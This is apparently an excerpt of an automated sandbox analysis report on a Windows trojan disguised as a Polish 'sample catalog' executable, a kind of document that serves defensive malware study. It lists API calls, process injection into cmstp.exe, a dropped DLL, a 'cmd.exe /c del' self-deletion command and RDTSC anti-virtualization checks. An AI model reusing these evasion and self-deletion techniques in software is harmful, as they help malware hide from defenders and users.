          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_1000B1F4
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_10015A1A
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_10015A29
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_1000A710
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_1000D3CD
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00401027
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_0041C94E
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_0041BA19
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_0041C3F9
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00408C90
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_0041BF22
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A820A8
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009CB090
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E20A0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A828EC
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A71002
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BF900
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009D4120
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A822AE
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EEBB0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A7DBD2
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A82B28
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C841F
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A7D466
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E2581
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A825DD
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009CD5E0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A82D07
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B0D20
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A81D55
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A82EF7
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009D6E30
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A81FF1
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_00401027
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_00401030
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_0041C94E
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_0041BA19
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_0041C3F9
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_00408C90
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_00402D90
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_0041BF22
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_00402FB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0470D466
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701002
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465841F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_047128EC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046720A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_047120A8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465B090
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04711D55
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04640D20
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04664120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464F900
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04712D07
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465D5E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_047125DD
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04672581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04666E30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04712EF7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_047122AE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04712B28
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04711FF1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0470DBD2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467EBB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0297C94E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_02962FB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_02968C90
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_02962D90
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: String function: 0041A4B0 appears 38 times
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: String function: 009BB150 appears 35 times
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 0464B150 appears 35 times
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_004185D0 NtCreateFile,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00418680 NtReadFile,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00418700 NtClose,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_004187B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_004185CD NtCreateFile,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_0041867E NtReadFile,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_004186FA NtClose,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_004187AA NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009FB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009FA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009FAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9560 NtWriteFile,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009FA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009FA770 NtOpenThread,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_004185D0 NtCreateFile,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_00418680 NtReadFile,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_00418700 NtClose,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_004187B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_004185CD NtCreateFile,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_0041867E NtReadFile,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_004186FA NtClose,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_004187AA NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046895D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046899A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046896E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046896D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0468B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046898F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046898A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0468AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046895F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046899D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0468A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0468A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046897A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0468A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_02978680 NtReadFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_029787B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_02978700 NtClose,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_029785D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_029786FA NtClose,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0297867E NtReadFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_029787AA NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_029785CD NtCreateFile,
          Source: nowy przyk#U0142adowy katalog.exe, 00000000.00000003.360157911.000000000EB2F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs nowy przyk#U0142adowy katalog.exe
          Source: nowy przyk#U0142adowy katalog.exe, 00000001.00000002.426560618.0000000000C3F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs nowy przyk#U0142adowy katalog.exe
          Source: nowy przyk#U0142adowy katalog.exe, 00000001.00000002.427125481.0000000002690000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameCMSTP.EXE` vs nowy przyk#U0142adowy katalog.exe
          Source: nowy przyk#U0142adowy katalog.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: nowy przyk#U0142adowy katalog.exeReversingLabs: Detection: 29%
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeFile read: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe
          Source: nowy przyk#U0142adowy katalog.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeProcess created: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeProcess created: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeFile created: C:\Users\user\AppData\Local\Temp\nsi487A.tmp
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/2@11/9
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeFile read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_004042C1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: nowy przyk#U0142adowy katalog.exeJoe Sandbox Cloud Basic: Detection: clean Score: 0
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5548:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: Binary string: cmstp.pdbGCTL source: nowy przyk#U0142adowy katalog.exe, 00000001.00000002.427125481.0000000002690000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: nowy przyk#U0142adowy katalog.exe, 00000000.00000003.355596507.000000000E880000.00000004.00000001.sdmp, nowy przyk#U0142adowy katalog.exe, 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, cmstp.exe, 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: nowy przyk#U0142adowy katalog.exe, cmstp.exe
          Source: Binary string: cmstp.pdb source: nowy przyk#U0142adowy katalog.exe, 00000001.00000002.427125481.0000000002690000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_10005CC5 push ecx; ret
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_0041B87C push eax; ret
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_0041B812 push eax; ret
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_0041B81B push eax; ret
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00416036 push cs; ret
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_0041A988 push cs; ret
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00415C85 push 0000003Eh; ret
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00414EBC push ecx; retf
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_0041B7C5 push eax; ret
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A0D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_0041B87C push eax; ret
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_0041B812 push eax; ret
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_0041B81B push eax; ret
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_00416036 push cs; ret
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_0041A988 push cs; ret
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_00415C85 push 0000003Eh; ret
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_00414EBC push ecx; retf
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_0041B7C5 push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0469D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0297B812 push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0297B81B push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_02976036 push cs; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0297B87C push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0297A988 push cs; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_02974EBC push ecx; retf
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0297B7C5 push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_02975C85 push 0000003Eh; ret
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeFile created: C:\Users\user\AppData\Local\Temp\nss48B9.tmp\rarelsbsy.dll

          Hooking and other Techniques for Hiding and Protection:

          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: /c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: /c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_10004E3E RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000002968614 second address: 000000000296861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 00000000029689AE second address: 00000000029689B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 5448Thread sleep time: -40000s >= -30000s
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 776Thread sleep time: -42000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmstp.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmstp.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_004088E0 rdtsc
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 0_2_00405EC2 FindFirstFileA, FindClose
